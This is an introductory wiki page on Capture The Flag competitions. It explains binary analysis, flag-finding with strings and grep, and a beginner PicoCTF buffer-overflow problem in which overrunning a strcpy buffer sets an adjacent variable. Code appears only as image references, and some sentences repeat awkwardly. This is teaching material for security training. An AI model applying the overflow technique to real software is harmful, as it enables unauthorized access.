Difference between revisions of "Capture The Flag 101"

From ICO wiki
(Sample Problem)
(What is "Binary Analysis"?)
Line 7: Line 7:
 
=== What is "Binary Analysis"? ===
 
=== What is "Binary Analysis"? ===
  
The word "binary" is an English word meaning "binary," "binary number," "binary system," "binary" In general, when we talk about "binary analysis", "binary" mostly has a more limited meaning than this. In other words, they refer to "data files with an executable format" in a narrower sense. This executable format includes, for example, Windows PE (EXE file) and Linux ELF. For a simpler and more familiar image, imagine software that can be executed by double-clicking, such as a calculator or email software. These are also included in the "binary" category. In the CTF, you will frequently be asked to analyze these "binaries". This is a problem where you are given an unknown binary file, and you have to figure out how it works by using various methods.
+
In general, when we talk about "binary analysis" or "binary" mostly has a more limited meaning than this. In other words, they refer to "data files with an executable format" in a narrower sense. This executable format includes, for example, Windows PE (EXE file) and Linux ELF. For a simpler and more familiar image, imagine software that can be executed by double-clicking, such as a calculator or email software. These are also included in the "binary" category. In the CTF, you will frequently be asked to analyze these "binaries". This is a problem where you are given an unknown binary file, and you have to figure out how it works by using various methods.
 
I would like you to get an idea of what it is like to analyze a binary file. If you were given an unknown program and asked to analyze its behavior, what would you do? I think most people would first try to run it. Also, if the source code of the program exists, you might try to read it, and the procedure of binary analysis is not much different from this basic one. The procedure for binary analysis is not much different from this basic one. First, you have to actually run the program to get a rough idea of how it works. Then read the code for the parts you want to know more about. However, there are two differences: first, we try to get more information by making use of various techniques and methods rather than just making it work, and second, we read code in a different form than source code, since source code does not exist in most cases.
 
I would like you to get an idea of what it is like to analyze a binary file. If you were given an unknown program and asked to analyze its behavior, what would you do? I think most people would first try to run it. Also, if the source code of the program exists, you might try to read it, and the procedure of binary analysis is not much different from this basic one. The procedure for binary analysis is not much different from this basic one. First, you have to actually run the program to get a rough idea of how it works. Then read the code for the parts you want to know more about. However, there are two differences: first, we try to get more information by making use of various techniques and methods rather than just making it work, and second, we read code in a different form than source code, since source code does not exist in most cases.
 
As mentioned earlier, even though it is binary, it is really an executable file, a program. The first thing to do is to try to run it. At that time, you cannot get more information than the standard input/output just by executing it, so it would be better if you understand that a special tool is used to get more information. In addition, just as we read the source code to understand the behavior of a program, we also read the code during binary analysis. However, since the binary code has been compiled once, you will not be reading the source code, but the assembly code obtained by a process called "disassembly". Disassembly is the process of converting machine language code into assembly language that is easy for humans to interpret. Many people think that reading assembly is difficult, but in fact it is not so different from reading source code.
 
As mentioned earlier, even though it is binary, it is really an executable file, a program. The first thing to do is to try to run it. At that time, you cannot get more information than the standard input/output just by executing it, so it would be better if you understand that a special tool is used to get more information. In addition, just as we read the source code to understand the behavior of a program, we also read the code during binary analysis. However, since the binary code has been compiled once, you will not be reading the source code, but the assembly code obtained by a process called "disassembly". Disassembly is the process of converting machine language code into assembly language that is easy for humans to interpret. Many people think that reading assembly is difficult, but in fact it is not so different from reading source code.

Revision as of 17:56, 3 May 2021

This wiki page will help you better understand the basics of CTF's.

What is Capture the Flag?

Types of challenges

Binary Analysis

What is "Binary Analysis"?

In general, when we talk about "binary analysis" or "binary" mostly has a more limited meaning than this. In other words, they refer to "data files with an executable format" in a narrower sense. This executable format includes, for example, Windows PE (EXE file) and Linux ELF. For a simpler and more familiar image, imagine software that can be executed by double-clicking, such as a calculator or email software. These are also included in the "binary" category. In the CTF, you will frequently be asked to analyze these "binaries". This is a problem where you are given an unknown binary file, and you have to figure out how it works by using various methods. I would like you to get an idea of what it is like to analyze a binary file. If you were given an unknown program and asked to analyze its behavior, what would you do? I think most people would first try to run it. Also, if the source code of the program exists, you might try to read it, and the procedure of binary analysis is not much different from this basic one. The procedure for binary analysis is not much different from this basic one. First, you have to actually run the program to get a rough idea of how it works. Then read the code for the parts you want to know more about. However, there are two differences: first, we try to get more information by making use of various techniques and methods rather than just making it work, and second, we read code in a different form than source code, since source code does not exist in most cases. As mentioned earlier, even though it is binary, it is really an executable file, a program. The first thing to do is to try to run it. At that time, you cannot get more information than the standard input/output just by executing it, so it would be better if you understand that a special tool is used to get more information. In addition, just as we read the source code to understand the behavior of a program, we also read the code during binary analysis. However, since the binary code has been compiled once, you will not be reading the source code, but the assembly code obtained by a process called "disassembly". Disassembly is the process of converting machine language code into assembly language that is easy for humans to interpret. Many people think that reading assembly is difficult, but in fact it is not so different from reading source code.

The Significance of Analyzing Binaries

What is the significance of analyzing binaries? Of course, it is to win the CTF, but since the CTF is an information security competition, binary analysis itself should be useful for information security in some way. First of all, from the security point of view, it can be said that binary analysis is most useful for malware analysis, and many of the dynamic and static analysis techniques used in CTF binary analysis are the same as those required for malware analysis. Therefore, if you are skilled in binary analysis in CTF, you can become a malware analyst relatively easily, as long as you acquire knowledge specific to malware analysis. Binary analysis can also be used in vulnerability assessment, where you analyze software to find vulnerabilities. Other than security, binary analysis may be useful for debugging software that you have simply developed, or for maintaining software that has not been maintained sufficiently since it was created, and whose use is no longer known. As you can see, doing binary analysis has many more social implications than just enjoying CTF. Binary analysis may be a technology that is a little difficult to learn. But on the other hand, I think it is worth doing, and there are plenty of places where it can be used. If you can learn binary analysis in CTF through this book, and make use of it in your various activities, you will be more than happy.

Binary Problems in CTF

In CTFs, binary problems are one of the most frequently asked questions in almost all competitions. In many cases, the number of questions is relatively large or the score is high, so it can be said that it is one of the core areas of CTF. In addition, there is a problem area called PWN, which focuses on exploiting vulnerabilities, and having binary analysis skills is also an important factor in this area. What exactly are the binary problems in CTF? Of course, there are a great variety of forms of problems when it comes to analyzing binaries and understanding their behavior. In the simplest case, it is a matter of parsing the behavior and providing input that satisfies certain conditions; in other cases, it is a matter of recovering obfuscated FLAGs. Some of them are games, where you get FLAGs for your activity. Of course, it's getting harder to win just by playing, and most of them require you to make good use of the analysis results. There are also other problems where you are given a binary that cannot be executed, and you have to predict the result of the execution by static analysis. In addition to these, there are many other types of problems that cannot be easily described here. The name of the field of binary problems is also referred to in various ways depending on the CTF. Some CTFs use the term "Binary" directly, while others use "Reversing" or "Reverse Engineering".

Sample Problem

File and String Commands Let's take an example of a file whose file format is not known, and check the output of the File command against it.

Image1 file.png

When we execute the File command, we get the following output. Let's interpret the result. First of all, the "PE32 executable" part indicates the format of the executable file. The PE format is an executable file format used in Windows. "Intel 80386 MS Windows" part indicates the supported CPU architecture and OS. We can see that they are for i386 and Windows, respectively.

Extracting strings can also increase your knowledge of the binary being analyzed. In the case of very beginner CTF problems, the string extracted from the file may contain FLAGs as is. For example, if you see the string "Correct!" or "Wrong...", you can guess that there might be a correct/incorrect question in the vicinity to get the FLAG. If you see "Wrong! If you see "Wrong...", you can guess that there might be a correct/incorrect question to get the FLAG. For example, if you use the String command to answer the question "Can you read? which was asked in CTF for beginners, let's try to explain it using the String command.

Image2 string.png

Many of the strings are meaningless because they are image files. We know in advance that the flags are all in the form ctf4B{FLAG}. Let's use the Grep command to extract the string starting with "ctf4b".

Image3 string grep.png

We've found the flag!

PWN

What is PWN?

Origin and Meaning of PWN The word "Pwn" originated from a mistype of "own" by a user in an online game, and became a slang word meaning "to win" or "to beat. In CTF, the problem of gaining server privileges by conquering a problem is called "pwn" or "pwnable".

PWN

PWN is one of the genres of CTFs. It is a problem that exploits a vulnerability in a program to access and manipulate memory areas that are not normally accessible, and obtain flags.
It is also known as Exploit. The format of the problem is to connect to the server where the vulnerable program is located or running via ssh or nc, and crack it.
Since we cannot prepare a server for cracking this time, here is the source code of the program to be cracked.
You can compile it at hand and try it.
Incidentally, the Pwn problem often shows the source code of vulnerable programs.

Tool

Since Pwn is an extension of Binary Analysis, the tools used in binary analysis are useful. GDB is one of the debuggers, and probably the most famous one. With GDB, you can refer to the values (global variables, functions, etc.) and their addresses in the global area of your program, and you can get more information than you can by running the program normally when it has segmentation faults or overflows. These are very useful in doing pwn, so I will use them in solving the problems in this article.

Sample Problem

This time, I'm referring to a problem from a permanent CTF called PicoCTF. PicoCTF is a CTF that is designed for beginners, and it is a great place to learn CTF. If you want to try CTF, you should definitely try it.

The source code for the problem looks like this

Image4 c.png

We can see that this problem is good if the value of secret is 0xc0deface.
However, the value of secret is 0.
Moreover, there is no code to rewrite it.
How do I rewrite it? As the name of the problem implies, we make it overflow.
In line 8, you do strcpy, which rewrites the outside of buf when the input size is larger than the size of buf.
Let's actually give it a value of 16 bytes or more. Image5 oevrflow1.png

It is a good idea to put the command line arguments in a script such as Python.
If you use one extra byte, it is rewritten from 0 to 41.
41 is the value as ASCII code for 'A'.
In other words, you can guess that the buf variable is followed by 4 bytes of secret variable.
 In fact, local variables should be packed into the stack area of memory in the order in which they are declared. So, let's enter any value after 17 bytes

Image6 overflow2.png

We have successfully obtained the flag!

Network

Steganography

Steganography is the art of hiding information in ways that prevent the detection of hidden messages. It includes a vast array of secret communications methods that conceal the message's very existence. These methods include invisible inks, microdots, character arrangement, digital signatures, covert channels, and spread spectrum communications. [1]

Web

SQL Injections

Conclusion

References

  1. IEEE (1998) Available at:https://ieeexplore.ieee.org/abstract/document/4655281 Accessed 01-05-2021

Enjoy PWN[Japanese] https://gist.github.com/matsubara0507/72dc50c89200a09f7c61

Binary Code Analysis by White Hat Security https://www.whitehatsec.com/glossary/content/binary-code-analysis

BINARY CODE ANALYS by Contrast Security https://www.contrastsecurity.com/knowledge-hub/glossary/binary-code-analysis